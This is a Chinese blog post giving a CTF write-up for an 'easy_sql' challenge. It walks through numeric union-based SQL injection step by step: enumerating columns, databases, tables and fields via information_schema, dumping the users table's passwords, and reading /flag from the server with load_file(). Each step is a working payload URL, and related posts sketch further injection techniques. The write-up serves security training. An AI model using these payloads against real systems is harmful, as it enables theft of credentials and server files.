easy_sql

最新推荐文章于 2024-08-17 16:26:59 发布
最新推荐文章于 2024-08-17 16:26:59 发布
阅读量564 收藏
点赞数 1
分类专栏: 安全 CTF WEB安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/satasun/article/details/115870173
版权
安全 同时被 3 个专栏收录
49 篇文章 6 订阅
订阅专栏
CTF
40 篇文章 1 订阅
订阅专栏
WEB安全
38 篇文章 0 订阅
订阅专栏

easy_sql

判断注入类型(字符型注入/数字型输入)

http://hwserver.bi0x.cn:8302/?id=1 and 1=1#

发现是数字型注入

判断字段数

http://hwserver.bi0x.cn:8302/?id=1 order by 3#

判断注入点

http://hwserver.bi0x.cn:8302/?id=0 union select 1,2,3#

1 2 3都是注入点

爆库名

http://hwserver.bi0x.cn:8302/?id=0 union select database(),2,3#

库名是ctf , 接下来爆表名

爆表名

http://hwserver.bi0x.cn:8302/?id=0 union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()#

表名如下:emails,referers,uagents,users

爆字段名

http://hwserver.bi0x.cn:8302/?id=0 union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

这里选择爆users表的字段,因为一般来说用户名密码才是数据库中最重要的资料。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MTKTGoTN-1618825320148)(C:\Users\12751\AppData\Roaming\Typora\typora-user-images\1618735710786.png)]

这里爆出字段名如下:id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

爆字段内容

http://hwserver.bi0x.cn:8302/?id=0 union select group_concat(password),2,3 from users#

这里爆出来flag:flag{this_is_easy_SQL}

然后得到另一个线索:flag in /flag

也就是说另外一个flag藏在数据库以外,需要使用mysql的函数去读取服务器文件。

读取文件

http://hwserver.bi0x.cn:8302/?id=0 union select load_file('/flag'),2,3#

flag:flag{th1s_1s_a_l1tt1e_h4rd_Sq1_f1ag}

完结撒花~

imbia
关注
专栏目录
【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8521
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 850
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
[SUCTF 2019]EasySQL相关笔记
最新发布
qq_73993347的博客
08-17 231
可以看到返回了一列2,但是此题查询仅返回1,且输入数字0无回显,可以判断该题的查询语句查询的是一个bool常量,并且查询结果为0时,不会响应到网页中,那么可以判断语句无非是。字符串做布尔值时默认为false,与数字比较是默认为0,但是此题输入*,a没有回显,猜测本题后端过滤了字母,只能使用数字作答。深入探究此题,*,0可以回显flag,猜测判断符为or且右侧为永假或者0,当然这里也有可能是>-1之类的。输入>=1的数时,返回的结果始终只有1,正常情况下常量查询,应该返回的是所查询的常量,比如下图。
Easysql
weixin_43610673的博客
03-04 759
无in注表名 无union select和字段名注数据 Fuzz测试过滤的关键词有: union *** select join information_schema in or and sleep benchmark if sys.schema_auto_increment_columns 因为过滤了in所以常用查询表名的方法不能用了 常用:information_schema,mysql.i...
easysql插件
02-24
eclipse的插件
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7651
攻防世界 -- very_easy_sql
[SWPUCTF 2021 新生赛]easy_sql
zoixsoadji的博客
05-06 1464
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
WriteUp_easy_sql_堆叠注入_强网杯2019
Art_Dillon
04-18 939
题目描述 随便注 解题过程 查看源码,发现应该不适合sqlmap自动化注入,该题应该是让你手工注入; <!-- sqlmap是没有灵魂的 --> <form method="get"> 姿势: <input type="text" name="inject" value="1"> <input type="submit"> <...
easy_sql解析
qq_73722777的博客
03-08 447
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
Easy SQL
2301_76723924的博客
04-12 823
输入用户名:1 密码:1″时,没有发生SQL语句报错,即没有产生报错信息,只是提示我们输入的值是不对的(提示”Input your username and password”),说明这里注入双引号并没有使sql语句报错,因此我们可以先假设SQL语句闭合方式是单引号。如果闭合后形成的sql语句是错误的,那么sql语句执行就会错误,从而造成页面显示错误。结合实际尝试,我们输入1″ 1的时候没有报错,输入1′ 1的时候返回了报错信息,逆着推说明假设是成立的,可以推出SQL语句闭合方式是单引号。
【NSSCTF】easy-sql
2301_80115024的博客
04-21 333
(之前做过类似题,就扒拉了一下题库,又找到了这一题练练手)先查看回显参数 /?wllm=1 如图判断字段数 /?wllm=-1' order by 3--+ /?wllm=-1' order by 4--+查询4时出现如图情况,因此有3个显示位查回显 /?wllm=-1' union select 1,2,3--+查表名 /?wllm=-1' union select 1,2,group_concat(table_name) f
ISCC,WebEasy-SQL
Pai_Space
05-25 2461
select 等被过滤,绕不过 id=1 至 8 有一些信息 id=8 时 用 sqlmap 可以查到数据库是 Mysql 8 Mysql 8 存在 table 注入 浅谈利用mysql8新特性进行SQL注入 - 安全客,安全资讯平台 测是否存在 http://59.110.159.206:7010/?id=-1 union table users limit 0,1 存在,可以利用,由于 id=8 时提示查邮件,看看是否存在 email 回显了 email,查 b
[CISCN2021]easy_sql|Ciyaso
Ciyaso的博客
05-17 435
easy_sql|Ciyaso 1.首先用sqlmap跑 得知了 库名security 继续跑发现了两个表users和flag 然后得知 users下有三个列id,password,username flag下有两列,id和一个没有列名的列 2.然后对 url 进行post注入,发现可以使用报错注入 admin') AND (SELECT 2155 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS N
探索易用的数据库管理工具:EasySQL
gitblog_00063的博客
04-22 458
探索易用的数据库管理工具:EasySQL EasySQL:floppy_disk: Easy (to operate) SQL Databases! A easy-to-use advanced SQL framework based on JDBC, supports multiple types of databases and connection pools, with high cus...
buuctf web easy sql
12-18
而引用中提到的sql_mode中的PIPES_AS_CONCAT选项将 || 视为字符串的连接操作符而非 "或" 运算符。 为了解决buuctf web easy sql这个题目,我们可以利用SQL注入的漏洞来绕过原本的查询逻辑,从而获取到flag。具体的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值